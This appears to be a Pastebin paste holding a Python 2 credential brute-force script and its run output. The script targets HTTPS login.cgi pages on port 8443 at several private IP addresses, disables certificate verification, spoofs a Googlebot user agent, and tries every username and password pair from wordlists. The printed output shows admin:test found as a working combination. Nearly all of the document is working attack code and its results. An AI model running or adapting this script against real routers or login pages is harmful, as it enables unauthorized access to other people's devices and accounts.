Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import ssl
- import base64
- import sys
- import urllib
- import urllib2
- import socket
- ssl._create_default_https_context = ssl._create_unverified_context
- if len(sys.argv) !=4:
- print "usage: %s userlist passwordlist" % (sys.argv[0])
- sys.exit(0)
- filename1=str(sys.argv[1])
- filename2=str(sys.argv[2])
- #filename3=str(sys.argv[3])
- userlist = open(filename1,'r')
- passwordlist = open(filename2,'r')
- #targets = open(filename3,'r')
- targets = ['192.168.2.1', '192.168.2.1', '192.168.2.2']
- #url = "https://192.168.2.1:8443/login.cgi"
- foundusers = []
- foundcreds = []
- OkStr="url=index.asp"
- headers = {}
- headers['User-Agent'] = "Googlebot"
- i=0
- for ip in targets:
- url = "https://"+ip.rstrip()+":8443/login.cgi"
- for user in userlist.readlines():
- for password in passwordlist.readlines():
- credentials=base64.b64encode(user.rstrip()+':'+password.rstrip())
- #print "trying "+user.rstrip()+':'+password.rstrip()
- data = urllib.urlencode({'login_authorization': credentials})
- try:
- req = urllib2.Request(url, data, headers=headers)
- request = urllib2.urlopen(req, timeout = 3)
- response = request.read()
- print 'ip=%r user=%r password=%r' % (ip, user, password)
- #print "[%d]" % (request.code)
- if (response.find(OkStr)>0):
- foundcreds.append(user.rstrip()+':'+password.rstrip())
- request.close()
- except urllib2.HTTPError, e:
- print "[-] Error = "+str(e)
- pass
- except socket.timeout, e:
- print "[-] Error = "+str(e)
- pass
- except ssl.SSLError, e:
- print "[-] Error = "+str(e)
- pass
- except urllib2.URLError, e :
- print "[-] Error = "+str(e)
- pass
- if len(foundcreds)>0:
- print "Found User and Password combinations:n"
- for name in foundcreds:
- print name+"n"
- else:
- print "No users foundn"
- ip='192.168.2.1' user='adminn' password='asdn'
- ip='192.168.2.1' user='adminn' password='qwern'
- ip='192.168.2.1' user='adminn' password='rewsn'
- ip='192.168.2.1' user='adminn' password='testn'
- Found User and Password combinations:
- admin:test
- Found User and Password combinations:
- admin:test
- Found User and Password combinations:
- admin:test
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement